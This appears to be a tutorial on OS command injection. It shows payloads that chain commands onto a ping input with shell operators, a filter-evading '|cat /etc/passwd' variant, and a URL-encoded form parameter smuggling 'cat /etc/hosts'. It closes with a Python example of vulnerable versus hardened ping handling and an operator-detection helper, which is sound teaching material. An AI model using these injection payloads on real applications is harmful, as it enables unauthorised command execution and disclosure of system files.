OS Command injection

Allows an attacker to execute arbitrary system commands on the host operating system through a vulnerable application. It normally happens when a web application takes user-supplied input and passes it directly to a shell interpreter.

Typical examples of this vulnerability look as follows:

  • When the application internally uses functions like system() or shell_exec(), which pass the input to a command interpreter

#We send a request with a command
curl -X POST http://url/? -d "cmd=whoami"
#If the parameter is handled by system(), the response contains the output of the command, which tells us we can talk to the internal shell

  • In some cases, the application receives input and passes it to an internal command executed in the server shell

#A form receives the IP as input and executes the ping command
8.8.8.8
#Example output
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_seq=1 ttl=117 time=26.4 ms
...
#We see that internally it works like the following command
ping $input

  • We can abuse this input to add other commands using the command operators

8.8.8.8; ls -la     #; runs the second command after the first, whatever the result
8.8.8.8 & ls -la    #& runs the first command in the background and runs the second
8.8.8.8 && ls -la   #&& runs the second command only if the first succeeds
8.8.8.8 | ls -la    #| pipes the output of the first command into the second
8.8.8.8 || ls -la   #|| runs the second command only if the first fails

  • Sometimes the input is sanitized to detect these symbols, so to avoid detection we can write the operator and the command together as a single string without spaces, which helps bypass naive filtering

8.8.8.8|cat /etc/passwd

  • This could also work on request parameters that are passed to an internal OS command

#Example: the parameters are passed to an internal OS command
Content-Type: application/x-www-form-urlencoded
Id=15&name=a

#We can concatenate commands. The & has to be URL-encoded as %26 (and the space as %20), otherwise the body parser would split it into a new parameter
Content-Type: application/x-www-form-urlencoded
Id=15&name=a%26cat%20%2fetc%2fhosts #After decoding, name becomes a&cat /etc/hosts
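As an added example that is not part of these notes, the following Python shows the vulnerable "ping $input" pattern beside a hardened version that validates the target and never goes through a shell, plus the form-body decoding that turns %26 into the & operator; the function names and the inputs are my own constructions.

```python
"""Vulnerable vs. hardened handling of the 'ping <input>' pattern (added example)."""
import ipaddress
import subprocess
from urllib.parse import parse_qs

# Shell command operators and substitution tokens seen in the injection payloads above.
SHELL_OPERATORS = (";", "&", "|", "\n", "`", "$(")


def vulnerable_ping_command(user_input: str) -> str:
    """Builds the command string exactly as a 'ping $input' handler would.
    It is returned instead of executed so the injected operator can be inspected."""
    return f"ping -c 1 {user_input}"  # a real handler would pass this to shell=True


def safe_ping_argv(user_input: str) -> list:
    """Hardened form: require an IP literal, then build an argv list so that no
    shell ever parses the value. Raises ValueError for anything else."""
    ip = ipaddress.ip_address(user_input.strip())  # rejects '8.8.8.8; ls -la'
    return ["ping", "-c", "1", str(ip)]


def is_valid_ping_target(user_input: str) -> bool:
    """True only when safe_ping_argv() would accept the value."""
    try:
        safe_ping_argv(user_input)
        return True
    except ValueError:
        return False


def run_safe_ping(user_input: str) -> subprocess.CompletedProcess:
    """Executes the validated argv without a shell (shell=False is the default)."""
    return subprocess.run(safe_ping_argv(user_input), capture_output=True, text=True)


def contains_shell_operator(value: str) -> bool:
    """Detection helper for logs or WAF rules: does a decoded parameter carry an operator?"""
    return any(op in value for op in SHELL_OPERATORS)


def decode_form(body: str) -> dict:
    """Decodes an application/x-www-form-urlencoded body the way a web framework does.
    %26 only becomes '&' after decoding, which is why the payload must be encoded."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


if __name__ == "__main__":
    print(vulnerable_ping_command("8.8.8.8; ls -la"))  # ping -c 1 8.8.8.8; ls -la
    print(is_valid_ping_target("8.8.8.8; ls -la"))     # False
    params = decode_form("Id=15&name=a%26cat%20%2fetc%2fhosts")  # constructed body
    print(params["name"], contains_shell_operator(params["name"]))  # a&cat /etc/hosts True
```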
